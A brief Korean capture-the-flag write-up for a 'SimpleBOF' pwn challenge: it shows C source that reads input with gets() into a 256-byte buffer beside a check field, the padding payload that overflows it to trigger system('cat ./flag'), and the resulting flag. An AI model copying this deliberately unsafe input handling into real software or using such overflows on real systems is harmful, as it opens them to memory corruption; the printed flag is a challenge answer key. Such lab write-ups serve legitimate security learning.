[Swing CTF] Pwn-SimpleBOF

SimpleBOF

문제 코드를 확인해보면 buf.check가 true면 cat ./flag로 플래그를 얻을 수 있다.

buf의 사이즈가 0x100이므로 쓰레기 값을 넣어서 플래그를 출력할 수 있을 것 같다.

#include <stdio.h>
#include <stdlib.h>

struct buf{
	char buf[0x100];
	int check;
};

int main(){
	struct buf buf;
	setvbuf(stdin, 0, 2, 0);
	setvbuf(stdout, 0, 2, 0);
	memset(buf.buf, NULL, sizeof(buf.buf));
	buf.check = 0;
	gets(buf.buf);
	if(buf.check){
		system("cat ./flag");  //플래그 얻을 수 있음!
	}
}

넣은 쓰레기값:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

SWING{6967716f4695b22ebe0abaec06ea7dd703f3421e32c2f41439a41f468092885d}